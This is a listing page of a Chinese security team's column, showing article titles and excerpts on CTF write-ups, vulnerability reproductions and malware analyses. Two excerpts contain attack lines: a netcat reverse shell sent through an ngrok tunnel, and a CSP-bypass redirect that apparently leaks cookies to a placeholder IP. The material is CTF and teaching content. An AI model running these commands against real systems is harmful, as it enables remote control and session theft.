首页
学习
活动
专区
工具
TVP
发布

ChaMd5安全团队

专栏成员
114
文章
181943
阅读量
61
订阅数
【翻译】看我如何利用PHP的0day黑掉Pornhub并获得2W美刀奖励
在分析了Pornhub使用的平台之后,我们在其网站上检测到了unserialize函数的使用,其中的很多功能点(例如上传图片的地方等等)都受到了影响,例如下面两个URL:
ChaMd5安全团队
2019-10-31
1.8K0
国际数字经济博览会安全大赛-Aliyun&Qcloud详细writeup
这次跟着Venom的师傅们一起参加了国际数字经济博览会的线下赛,谢谢师傅们带躺到第三hhh,CTF解题赛的三道云安全的题目感觉还挺经典的,拿了其中一道Aliyun题的一血,另一道题快做出来的时候队里的师傅就做出来了Orz,Jdyun的全程自闭没有做出来也是很遗憾(最终在主办方放了两个hint后第一名的M01N战队做出了全场唯一解,师傅们太强了),故写下wp记录一下。
ChaMd5安全团队
2019-10-21
9590
TeamViewer攻陷疑云
TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、Windows Phone 8和黑莓操作系统等的远程控制软件。除了远程控制外,TeamViewer还包含合同协作与示范等功能。
ChaMd5安全团队
2019-10-14
1.2K0
SSTI Bypass 分析
护网杯过去不久,realworld到来之前先来研究研究SSTI的Bypass套路。
ChaMd5安全团队
2019-10-14
1.7K0
“送给最好的TA.apk”简单逆向分析
20190927收到一个apk,名字叫“送给最好的TA.apk”。文件哈希值如下:
ChaMd5安全团队
2019-10-03
2.2K0
phpstudy后门文件分析以及检测脚本
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。
ChaMd5安全团队
2019-09-25
9740
"数字经济"云安全公测大赛 WriteUp
Java 和 python 的 RSA 私钥加密略有不同,所以不浪费时间,直接从 apk 里抠出来加密部分,注意需要处理一下 base64 部分
ChaMd5安全团队
2019-09-25
1.1K0
CVE-2019-0708微软RDP远程代码执行漏洞复现
BlueKeep(CVE-2019-0708)是微软远程桌面协议(RDP)实现中发现的一个安全漏洞,它允许远程执行代码。
ChaMd5安全团队
2019-09-10
2.6K0
SUCTF-WriteUp(上)
https://gist.github.com/ed22c1ad2dc22c56f266a92635a9591c#file-str_or_str-php
ChaMd5安全团队
2019-08-23
1.4K0
SUCTF-WriteUp(下)
而后就有了几次任意地址读且栈溢的机会,因此直接在任意地址读时读取伪造CPPEH_RECORD需要的其他信息(cookie等)
ChaMd5安全团队
2019-08-23
1.4K0
SCTF WriteUp
Web math-is-fun1 解题思路 这里有变量覆盖: 可以覆盖全局变量: 使用跳转方式绕过 CSP: location.href=`//xxx.xxx.xxx.xxx/?${documen
ChaMd5安全团队
2019-07-08
1.1K0
FireShell CTF WriteUp
招新小广告 ChaMd5 ctf组 长期招新 尤其是reverse+pwn+合约的大佬 欢迎联系admin@chamd5.org Web Bad Injection 解题思路 任意文件下载: url
ChaMd5安全团队
2019-03-07
1.4K0
恭喜ChaMd5荣获Real World CTF第九名
12月1-2日,在中国郑州,由长亭科技主办的首届Real World国际CTF网络安全大赛线下总决赛大幕开启。
ChaMd5安全团队
2018-12-24
1K0
常见端口转发工具的使用方式(二)
Ngrok Ngrok一个反向代理,通过在公共的端点和本地端口建立一个安全的通道,其功能可以反向代理出web服务还有端口转发,这里我们主要演示端口转发的功能 由于ngrok这个工具官网是要访问外国网站的,所以是能使用国内的Sunny-Ngrok 反弹nc shell 首先我们启动ngrok ./sunny clientid 隧道id 📷 本地监听端口: nc -vv -lp 9991 📷 目标机器: nc -vv server.ngrok.cc 33388 -e cm
ChaMd5安全团队
2018-03-29
1.2K0
CTF学习站点总结
CTF学习站点总结 0x00 前言 公众号的后台,有很多的朋友都在问,你们CTF是怎么入门的? 有没有什么东西能和我们分享下的? 有没有什么学习的网站啊之类的问题,想了很久,决定给大家分享一些。 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 0x01 CTF 资讯 XCTF联赛
ChaMd5安全团队
2018-03-29
1.6K0
永恒之石,你怕了吗?
永恒之石,你怕了吗? From ChaMd5安全团队核心成员 逍遥自在 这个五月,我们经历了感染了7万5千台电脑的WannaCry,没有了紧急开关的 WannaCry2.0,好不容易快到月底了,想着能平平安安的过去了。突然晴天霹雳,EternalRocks(永恒之石)又来了,别急别急,不要怕,ChaMd5带你了解了解下这个病毒。 一打开新闻,小编都被吓到了,最新病毒EtermalRocks用了七个NSA漏洞!!!什么,七个,要知道永恒之蓝才只用了两个啊!难道又爆出了几个?小编都准备去找找新的神器了。
ChaMd5安全团队
2018-03-29
9490
HBCTF第一场2个pwn题的简单分析
【ChaMd5安全团队所有文章均来源实战,为保证厂商安全信息,文章内容以思路为主。 需要转载,请先联系ChaMd5安全团队授权。 未经授权请勿转载。】 HBCTF第一场2个pwn题的简单分析
ChaMd5安全团队
2018-03-29
1.5K0
没有更多了
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档